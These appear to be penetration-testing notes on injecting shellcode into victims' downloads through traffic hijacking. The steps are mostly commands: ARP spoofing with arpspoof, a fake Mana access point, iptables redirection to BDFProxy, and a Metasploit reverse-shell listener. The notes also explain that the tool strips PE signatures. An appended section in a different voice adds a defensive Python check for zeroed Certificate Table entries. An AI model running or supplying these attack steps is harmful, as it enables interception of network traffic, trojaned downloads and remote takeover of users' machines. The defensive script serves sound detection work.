● Dynamic shellcode injection through traffic hijacking (ARP spoof, DNS spoof, fake AP)
Steps:
sysctl -w net.ipv4.ip_forward=1 # enable local IP forwarding
iptables -t nat -A PREROUTING -p tcp --dport 80/443 -j REDIRECT --to-ports 8080
vim /etc/bdfproxy/bdfproxy.cfg
proxyMode = transparent
# change the listening IP address and start bdfproxy
arpspoof -i eth0 -t 1.1.1.2 1.1.1.1
Start msf
● Mana creates the fake AP
● bdfproxy injects the code through the proxy
● msf listens for the reverse shell
vi /etc/mana-toolkit/hostapd-mana-conf
# change the wireless SSID name
./usr/share/mana-toolkit/run-mana/start-nat-simple.sh
# set the wlan1 wireless adapter and start
iptables -t nat -A PREROUTING -i $phy -p tcp --dport 80/443 -j REDIRECT --to-port 8080
vi /etc/bdfproxy/bdfproxy.cfg
proxyMode = transparent
Change the listening IP address and start bdfproxy
# start MSF
Msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc
Additional notes
● Site-wide HTTPS prevents the injection (otherwise every Microsoft patch download could carry a trojan)
● The certificate signature of a PE file can be removed
● PE Header -> Optional Header -> Certificate Table (address and size)
○ Overwritten entirely with zeros
○ BDF clears the digital signature by default
https://live.sysinternals.com/
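The Certificate Table entry named above is exactly what a signature-stripping tool zeroes. As an added example (not part of the original notes), this Python script reads that data-directory entry from the optional header and reports whether a binary still carries a certificate table, so a defender can flag downloaded binaries whose signature directory has been zeroed; the PE header it checks is constructed inline and is not an executable.

```python
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4   # index of the Certificate Table in the data directories

def certificate_table(pe: bytes):
    """Return (file_offset, size) of the Certificate Table directory entry,
    or None if the optional header does not carry that entry at all."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: bad PE signature")
    opt = e_lfanew + 4 + 20                      # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == 0x10B:                           # PE32: NumberOfRvaAndSizes at +92, directories at +96
        nrva_off, dir_base = opt + 92, opt + 96
    elif magic == 0x20B:                         # PE32+: NumberOfRvaAndSizes at +108, directories at +112
        nrva_off, dir_base = opt + 108, opt + 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    if struct.unpack_from("<I", pe, nrva_off)[0] <= IMAGE_DIRECTORY_ENTRY_SECURITY:
        return None
    return struct.unpack_from("<II", pe, dir_base + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)

def signature_status(pe: bytes) -> str:
    """'signed' when the entry points at a certificate table inside the file,
    'unsigned' when it is absent or zeroed (what a cleared signature leaves behind),
    'corrupt' when it points outside the file."""
    entry = certificate_table(pe)
    if entry is None or entry == (0, 0):
        return "unsigned"
    off, size = entry
    return "signed" if 0 < off and off + size <= len(pe) else "corrupt"

def build_sample(cert_offset: int, cert_size: int) -> bytes:
    """Constructed PE32+ image (headers only, not executable) with a chosen
    Certificate Table entry; used here purely as test input."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)                   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x22)        # x64, 1 section, 240-byte optional header
    opt = struct.pack("<H", 0x20B) + b"\0" * 106 + struct.pack("<I", 16)  # magic, padding, NumberOfRvaAndSizes = 16
    dirs = bytearray(16 * 8)
    struct.pack_into("<II", dirs, 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, cert_offset, cert_size)
    image = dos + b"PE\0\0" + coff + opt + bytes(dirs)
    return image.ljust(max(len(image), cert_offset + cert_size), b"\0")  # pad so the table fits in the file

SIGNED_SAMPLE = build_sample(0x400, 0x100)   # entry present: the binary still carries a certificate table
STRIPPED_SAMPLE = build_sample(0, 0)         # entry zeroed: what a cleared signature looks like
```

The script only inspects the directory entry; it does not verify the Authenticode signature itself (use signtool or Get-AuthenticodeSignature for that), and a stripped binary is indistinguishable from one that was never signed, so the check serves as a "must be signed" gate rather than as proof of tampering.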